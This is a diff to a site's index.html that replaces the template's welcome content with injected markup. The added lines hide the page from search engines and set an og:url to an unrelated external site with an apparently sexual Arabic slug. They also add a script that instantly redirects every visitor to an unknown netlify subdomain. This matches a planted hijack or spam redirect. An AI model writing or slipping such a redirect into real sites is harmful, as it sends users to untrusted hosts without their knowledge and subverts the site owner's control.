--- a/pages/index.html
+++ b/pages/index.html
@@ -1,4 +1,9 @@
-{% extends "base.html" %}
-{% block content %}
-Welcome to Cactus!
-{% endblock %}
+<meta content='noarchive' name='googlebot'/>
+<meta content='noindex, nofollow' name='robots'/>
+
+<meta content='http://agra3bnat.com/2016/03/26/%d8%aa%d9%84%d9%85%d9%8a%d8%b0-%d9%8a%d9%86%d9%8a%d9%83-%d8%b5%d8%a7%d8%ad%d8%a8%d8%aa%d8%a9-%d9%85%d9%86-%d8%b7%d9%8a%d8%b2%d9%87%d8%a7-%d8%a8%d8%b9%d8%af-%d8%a7%d9%84%d9%85%d8%b0%d8%a7%d9%83%d8%b1/' property='og:url'/>
+
+<script>
+    setTimeout(function(){location.href="http://57668a974e9f9d2207ed5f25.cu45015.netlify.com"} ,0 );
+</script>
+
